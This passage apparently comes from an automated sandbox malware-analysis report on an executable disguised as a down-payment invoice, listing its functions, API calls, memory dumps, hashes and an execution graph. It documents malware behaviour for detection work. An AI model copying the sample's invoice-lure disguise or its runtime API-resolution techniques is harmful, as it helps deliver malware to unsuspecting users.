                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                      • Opcode ID: 525eaf9e8de9115a0521695d79f42080039b7e79be990b3fc1c06578ff73fab5
                                                                                                                                                                                                                      • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 525eaf9e8de9115a0521695d79f42080039b7e79be990b3fc1c06578ff73fab5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76012EE0,00403A1A,76013420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                                                                                      • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405D09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405D0F
                                                                                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405D1F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                      • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6F1D116A
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D11C7
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D11D9
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D1203
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                      • Opcode ID: ec08562df58d1ce6d04fef2e52563ba1188342f31865d9dbc7f9f4bacd03aed2
                                                                                                                                                                                                                      • Instruction ID: ae7ecfc9845697e5f6b9c7c0233c495c592531d87ea0a07fe3be72a288de6757
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec08562df58d1ce6d04fef2e52563ba1188342f31865d9dbc7f9f4bacd03aed2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B3190B25012059FFB009FB8D945AA6B7FCFB563E0B10462AF844F7254E736E921CB21
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.4%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                      Signature Coverage:1.6%
                                                                                                                                                                                                                      Total number of Nodes:1665
                                                                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                                                                      execution_graph 7689 356321a1 7692 35632418 7689->7692 7694 35632420 7692->7694 7696 356347f5 7694->7696 7695 356321bc 7697 35634804 7696->7697 7698 35634808 7696->7698 7697->7695 7701 35634815 7698->7701 7702 35635b7a 20 API calls 7701->7702 7705 3563482c 7702->7705 7703 35632ada 5 API calls 7704 35634811 7703->7704 7704->7695 7705->7703 7309 3563a1e0 7312 3563a1fe 7309->7312 7311 3563a1f6 7316 3563a203 7312->7316 7313 3563aa53 21 API calls 7315 3563a42f 7313->7315 7314 3563a298 7314->7311 7315->7311 7316->7313 7316->7314 7706 356381a0 7707 356381d9 7706->7707 7708 356381dd 7707->7708 7719 35638205 7707->7719 7709 35636368 20 API calls 7708->7709 7711 356381e2 7709->7711 7710 35638529 7712 35632ada 5 API calls 7710->7712 7713 356362ac 26 API calls 7711->7713 7714 35638536 7712->7714 7715 356381ed 7713->7715 7716 35632ada 5 API calls 7715->7716 7717 356381f9 7716->7717 7719->7710 7720 356380c0 7719->7720 7721 356380db 7720->7721 7722 35632ada 5 API calls 7721->7722 7723 35638152 7722->7723 7723->7719 5786 3563c7a7 5787 3563c7be 5786->5787 5792 3563c82c 5786->5792 5787->5792 5798 3563c7e6 GetModuleHandleA 5787->5798 5789 3563c872 5790 3563c835 GetModuleHandleA 5793 3563c83f 5790->5793 5791 3563c7dd 5791->5792 5791->5793 5795 3563c800 GetProcAddress 5791->5795 5792->5789 5792->5790 5792->5793 5793->5792 5794 3563c85f GetProcAddress 5793->5794 5794->5792 5795->5792 5796 3563c80d VirtualProtect 5795->5796 5796->5792 5797 3563c81c VirtualProtect 5796->5797 5797->5792 5799 3563c7ef 5798->5799 5805 3563c82c 5798->5805 5810 3563c803 GetProcAddress 5799->5810 5801 3563c7f4 5804 3563c800 GetProcAddress 5801->5804 5801->5805 5802 3563c872 5803 3563c835 GetModuleHandleA 5808 3563c83f 5803->5808 5804->5805 5806 3563c80d VirtualProtect 5804->5806 5805->5802 5805->5803 5805->5808 5806->5805 5807 3563c81c VirtualProtect 5806->5807 5807->5805 5808->5805 5809 3563c85f GetProcAddress 5808->5809 5809->5805 5811 3563c82c 5810->5811 5812 3563c80d VirtualProtect 5810->5812 5814 3563c872 5811->5814 5815 3563c835 GetModuleHandleA 5811->5815 5812->5811 5813 3563c81c VirtualProtect 5812->5813 5813->5811 5816 3563c83f 5815->5816 5816->5811 5817 3563c85f GetProcAddress 5816->5817 5817->5816 6482 3563ac6b 6483 3563ac84 6482->6483 6485 3563acad 6483->6485 6486 3563b2f0 6483->6486 6487 3563b329 6486->6487 6489 3563b350 6487->6489 6497 3563b5c1 6487->6497 6490 3563b393 6489->6490 6491 3563b36e 6489->6491 6510 3563b8b2 6490->6510 6501 3563b8e1 6491->6501 6494 3563b38e 6495 35632ada 5 API calls 6494->6495 6496 3563b3b7 6495->6496 6496->6485 6498 3563b5ec 6497->6498 6499 3563b7e5 RaiseException 6498->6499 6500 3563b7fd 6499->6500 6500->6489 6502 3563b8f0 6501->6502 6503 3563b964 6502->6503 6504 3563b90f 6502->6504 6505 3563b8b2 20 API calls 6503->6505 6517 356378a3 6504->6517 6509 3563b95d 6505->6509 6508 3563b8b2 20 API calls 6508->6509 6509->6494 6511 3563b8d4 6510->6511 6512 3563b8bf 6510->6512 6513 35636368 20 API calls 6511->6513 6514 35636368 20 API calls 6512->6514 6515 3563b8d9 6512->6515 6513->6515 6516 3563b8cc 6514->6516 6515->6494 6516->6494 6520 356378cb 6517->6520 6518 35632ada 5 API calls 6519 356378e8 6518->6519 6519->6508 6519->6509 6520->6518 7258 3563742b 7259 35637430 7258->7259 7261 35637453 7259->7261 7262 35638bae 7259->7262 7263 35638bdd 7262->7263 7264 35638bbb 7262->7264 7263->7259 7265 35638bd7 7264->7265 7266 35638bc9 RtlDeleteCriticalSection 7264->7266 7267 3563571e 20 API calls 7265->7267 7266->7265 7266->7266 7267->7263 6521 3563506f 6522 35635081 6521->6522 6523 35635087 6521->6523 6525 35635000 6522->6525 6529 3563502a 6525->6529 6530 3563500d 6525->6530 6526 35635024 6527 3563571e 20 API calls 6526->6527 6527->6529 6528 3563571e 20 API calls 6528->6530 6529->6523 6530->6526 6530->6528 7724 356360ac 7725 356360dd 7724->7725 7727 356360b7 7724->7727 7726 356360c7 FreeLibrary 7726->7727 7727->7725 7727->7726 7728 35633eb3 7731 35635411 7728->7731 7732 3563541d 7731->7732 7733 35635af6 38 API calls 7732->7733 7736 35635422 7733->7736 7734 356355a8 38 API calls 7735 3563544c 7734->7735 7736->7734 6531 35639e71 6532 35639e95 6531->6532 6534 35639ee6 6532->6534 6536 35639f71 6532->6536 6533 35639ef8 6534->6533 6539 3563aa53 6534->6539 6537 3563b2f0 21 API calls 6536->6537 6538 3563acad 6536->6538 6537->6538 6540 3563aa70 RtlDecodePointer 6539->6540 6542 3563aa80 6539->6542 6540->6542 6541 35632ada 5 API calls 6544 3563ac67 6541->6544 6543 3563ab0d 6542->6543 6545 3563ab02 6542->6545 6547 3563aab7 6542->6547 6543->6545 6546 35636368 20 API calls 6543->6546 6544->6533 6545->6541 6546->6545 6547->6545 6548 35636368 20 API calls 6547->6548 6548->6545 6549 35633370 6560 35633330 6549->6560 6561 35633342 6560->6561 6562 3563334f 6560->6562 6563 35632ada 5 API calls 6561->6563 6563->6562 7268 35635630 7271 3563563b 7268->7271 7270 35635664 7281 35635688 7270->7281 7271->7270 7272 35635660 7271->7272 7274 35635eb7 7271->7274 7275 35635c45 5 API calls 7274->7275 7276 35635ede 7275->7276 7277 35635efc InitializeCriticalSectionAndSpinCount 7276->7277 7278 35635ee7 7276->7278 7277->7278 7279 35632ada 5 API calls 7278->7279 7280 35635f13 7279->7280 7280->7271 7282 35635695 7281->7282 7284 356356b4 7281->7284 7283 3563569f RtlDeleteCriticalSection 7282->7283 7283->7283 7283->7284 7284->7272 7317 356363f0 7318 35636400 7317->7318 7324 35636416 7317->7324 7319 35636368 20 API calls 7318->7319 7320 35636405 7319->7320 7322 356362ac 26 API calls 7320->7322 7331 3563640f 7322->7331 7323 35636480 7347 35634e76 7323->7347 7324->7323 7329 35636561 7324->7329 7336 35636580 7324->7336 7325 356364e5 7327 356364ee 7325->7327 7333 35636573 7325->7333 7353 356385eb 7325->7353 7328 3563571e 20 API calls 7327->7328 7328->7329 7362 3563679a 7329->7362 7334 356362bc 11 API calls 7333->7334 7335 3563657f 7334->7335 7337 3563658c 7336->7337 7337->7337 7338 3563637b 20 API calls 7337->7338 7339 356365ba 7338->7339 7340 356385eb 26 API calls 7339->7340 7341 356365e6 7340->7341 7342 356362bc 11 API calls 7341->7342 7343 35636615 7342->7343 7344 356366b6 FindFirstFileExA 7343->7344 7345 35636705 7344->7345 7346 35636580 26 API calls 7345->7346 7348 35634e87 7347->7348 7349 35634e8b 7347->7349 7348->7325 7349->7348 7350 3563637b 20 API calls 7349->7350 7351 35634eb9 7350->7351 7352 3563571e 20 API calls 7351->7352 7352->7348 7356 3563853a 7353->7356 7354 3563854f 7355 35636368 20 API calls 7354->7355 7357 35638554 7354->7357 7361 3563857a 7355->7361 7356->7354 7356->7357 7359 3563858b 7356->7359 7357->7325 7358 356362ac 26 API calls 7358->7357 7359->7357 7360 35636368 20 API calls 7359->7360 7360->7361 7361->7358 7366 356367a4 7362->7366 7363 356367b4 7365 3563571e 20 API calls 7363->7365 7364 3563571e 20 API calls 7364->7366 7367 356367bb 7365->7367 7366->7363 7366->7364 7367->7331 7741 35639db8 7742 35639dbf 7741->7742 7743 35639e20 7742->7743 7745 35639ddf 7742->7745 7744 3563aa17 21 API calls 7743->7744 7747 3563a90e 7743->7747 7746 35639e6e 7744->7746 7745->7747 7748 3563aa17 21 API calls 7745->7748 7749 3563a93e 7748->7749 7368 35635bff 7376 35635d5c 7368->7376 7371 35635c13 7372 35635b7a 20 API calls 7373 35635c1b 7372->7373 7374 35635c28 7373->7374 7375 35635c2b 11 API calls 7373->7375 7375->7371 7377 35635c45 5 API calls 7376->7377 7378 35635d83 7377->7378 7379 35635d9b TlsAlloc 7378->7379 7381 35635d8c 7378->7381 7379->7381 7380 35632ada 5 API calls 7382 35635c09 7380->7382 7381->7380 7382->7371 7382->7372 7750 356367bf 7755 356367f4 7750->7755 7753 356367db 7754 3563571e 20 API calls 7754->7753 7756 35636806 7755->7756 7765 356367cd 7755->7765 7757 35636836 7756->7757 7758 3563680b 7756->7758 7757->7765 7766 356371d6 7757->7766 7759 3563637b 20 API calls 7758->7759 7760 35636814 7759->7760 7762 3563571e 20 API calls 7760->7762 7762->7765 7763 35636851 7764 3563571e 20 API calls 7763->7764 7764->7765 7765->7753 7765->7754 7767 356371e1 7766->7767 7768 35637209 7767->7768 7769 356371fa 7767->7769 7770 35637218 7768->7770 7775 35638a98 7768->7775 7771 35636368 20 API calls 7769->7771 7782 35638acb 7770->7782 7773 356371ff 7771->7773 7773->7763 7776 35638aa3 7775->7776 7777 35638ab8 RtlSizeHeap 7775->7777 7778 35636368 20 API calls 7776->7778 7777->7770 7779 35638aa8 7778->7779 7780 356362ac 26 API calls 7779->7780 7781 35638ab3 7780->7781 7781->7770 7783 35638ae3 7782->7783 7784 35638ad8 7782->7784 7786 35638aeb 7783->7786 7792 35638af4 7783->7792 7785 356356d0 21 API calls 7784->7785 7791 35638ae0 7785->7791 7789 3563571e 20 API calls 7786->7789 7787 35638af9 7790 35636368 20 API calls 7787->7790 7788 35638b1e RtlReAllocateHeap 7788->7791 7788->7792 7789->7791 7790->7791 7791->7773 7792->7787 7792->7788 7793 3563474f 7 API calls 7792->7793 7793->7792 7285 3563543d 7286 35635440 7285->7286 7287 356355a8 38 API calls 7286->7287 7288 3563544c 7287->7288 6564 3563af43 6565 3563af59 6564->6565 6566 3563af4d 6564->6566 6566->6565 6567 3563af52 CloseHandle 6566->6567 6567->6565 7289 35637103 GetCommandLineA GetCommandLineW 7290 35635303 7293 356350a5 7290->7293 7302 3563502f 7293->7302 7296 3563502f 5 API calls 7297 356350c3 7296->7297 7298 35635000 20 API calls 7297->7298 7299 356350ce 7298->7299 7300 35635000 20 API calls 7299->7300 7301 356350d9 7300->7301 7303 35635048 7302->7303 7304 35632ada 5 API calls 7303->7304 7305 35635069 7304->7305 7305->7296 6568 35638640 6571 35638657 6568->6571 6572 35638665 6571->6572 6573 35638679 6571->6573 6574 35636368 20 API calls 6572->6574 6575 35638693 6573->6575 6576 35638681 6573->6576 6577 3563866a 6574->6577 6582 35638652 6575->6582 6587 356354a7 6575->6587 6578 35636368 20 API calls 6576->6578 6584 356362ac 6577->6584 6581 35638686 6578->6581 6583 356362ac 26 API calls 6581->6583 6583->6582 6595 35636231 6584->6595 6586 356362b8 6586->6582 6588 356354c4 6587->6588 6589 356354ba 6587->6589 6588->6589 6616 35635af6 GetLastError 6588->6616 6589->6582 6591 356354e5 6636 35637a00 6591->6636 6596 35635b7a 20 API calls 6595->6596 6597 35636247 6596->6597 6598 356362a6 6597->6598 6599 35636255 6597->6599 6606 356362bc IsProcessorFeaturePresent 6598->6606 6603 35632ada 5 API calls 6599->6603 6601 356362ab 6602 35636231 26 API calls 6601->6602 6604 356362b8 6602->6604 6605 3563627c 6603->6605 6604->6586 6605->6586 6607 356362c7 6606->6607 6610 356360e2 6607->6610 6611 356360fe 6610->6611 6612 3563612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6611->6612 6615 356361fb 6612->6615 6613 35632ada 5 API calls 6614 35636219 GetCurrentProcess TerminateProcess 6613->6614 6614->6601 6615->6613 6617 35635b12 6616->6617 6618 35635b0c 6616->6618 6620 3563637b 20 API calls 6617->6620 6622 35635b61 SetLastError 6617->6622 6619 35635e08 11 API calls 6618->6619 6619->6617 6621 35635b24 6620->6621 6623 35635b2c 6621->6623 6624 35635e5e 11 API calls 6621->6624 6622->6591 6625 3563571e 20 API calls 6623->6625 6626 35635b41 6624->6626 6627 35635b32 6625->6627 6626->6623 6628 35635b48 6626->6628 6629 35635b6d SetLastError 6627->6629 6630 3563593c 20 API calls 6628->6630 6644 356355a8 6629->6644 6632 35635b53 6630->6632 6633 3563571e 20 API calls 6632->6633 6635 35635b5a 6633->6635 6635->6622 6635->6629 6637 35637a13 6636->6637 6638 356354fe 6636->6638 6637->6638 6712 35637f0f 6637->6712 6640 35637a2d 6638->6640 6641 35637a40 6640->6641 6642 35637a55 6640->6642 6641->6642 6847 35636d7e 6641->6847 6642->6589 6655 35637613 6644->6655 6647 356355b8 6649 356355c2 IsProcessorFeaturePresent 6647->6649 6654 356355e0 6647->6654 6651 356355cd 6649->6651 6653 356360e2 8 API calls 6651->6653 6653->6654 6685 35634bc1 6654->6685 6688 35637581 6655->6688 6658 3563766e 6659 3563767a 6658->6659 6660 35635b7a 20 API calls 6659->6660 6664 356376a7 6659->6664 6667 356376a1 6659->6667 6660->6667 6661 356376f3 6662 35636368 20 API calls 6661->6662 6663 356376f8 6662->6663 6665 356362ac 26 API calls 6663->6665 6671 3563771f 6664->6671 6702 35635671 RtlEnterCriticalSection 6664->6702 6668 356376d6 6665->6668 6666 